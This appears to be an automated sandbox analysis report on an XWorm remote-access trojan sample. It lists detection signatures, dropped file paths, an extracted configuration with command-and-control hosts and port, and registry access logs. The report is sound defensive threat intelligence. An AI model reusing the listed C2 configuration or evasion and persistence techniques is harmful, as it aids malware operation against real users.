Windows Analysis Report
mIURiU8n2P.exe

Overview

General Information

Sample name: mIURiU8n2P.exe
renamed because original name is a hash value
Original sample name: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40.exe
Analysis ID: 1532627
MD5: e1c82191b678cea8f3c996887ddc1232
SHA1: 7946006ca278892817b7a778eea1e04f5b2f948c
SHA256: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
Tags: exeuser-Chainskilabs
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: mIURiU8n2P.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\Public\DeadXClient.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\Public\DeadCodeRootKit.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\Public\Deadsvchost.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\Public\DeadROOTkit.exe Avira: detection malicious, Label: TR/Spy.Gen
Found malware configuration
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["subscribe-bond.gl.at.ply.gg"], "Port": "28600", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Multi AV Scanner detection for domain / URL
Source: subscribe-bond.gl.at.ply.gg Virustotal: Detection: 8% Perma Link
Source: subscribe-bond.gl.at.ply.gg Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\DeadCodeRootKit.exe ReversingLabs: Detection: 91%
Source: C:\Users\Public\DeadCodeRootKit.exe Virustotal: Detection: 81% Perma Link
Source: C:\Users\Public\DeadROOTkit.exe ReversingLabs: Detection: 87%
Source: C:\Users\Public\DeadROOTkit.exe Virustotal: Detection: 64% Perma Link
Source: C:\Users\Public\DeadXClient.exe ReversingLabs: Detection: 95%
Source: C:\Users\Public\DeadXClient.exe Virustotal: Detection: 71% Perma Link
Source: C:\Users\Public\Deadsvchost.exe ReversingLabs: Detection: 95%
Source: C:\Users\Public\Deadsvchost.exe Virustotal: Detection: 71% Perma Link
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe Virustotal: Detection: 64% Perma Link
Multi AV Scanner detection for submitted file
Source: mIURiU8n2P.exe ReversingLabs: Detection: 73%
Source: mIURiU8n2P.exe Virustotal: Detection: 67% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe Joe Sandbox ML: detected
Source: C:\Users\Public\DeadXClient.exe Joe Sandbox ML: detected
Source: C:\Users\Public\DeadCodeRootKit.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Deadsvchost.exe Joe Sandbox ML: detected
Source: C:\Users\Public\DeadROOTkit.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: mIURiU8n2P.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: updates-full.gl.at.ply.gg
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: 60075
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: <123456789>
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: <Xwormmm>
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: USB.exe
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: BTC_Address
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: ETH_Address
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: TRC20_Address
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: Your_Token
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: Your_ID
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B01000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_00B01000
Uses 32bit PE files
Source: mIURiU8n2P.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: mIURiU8n2P.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
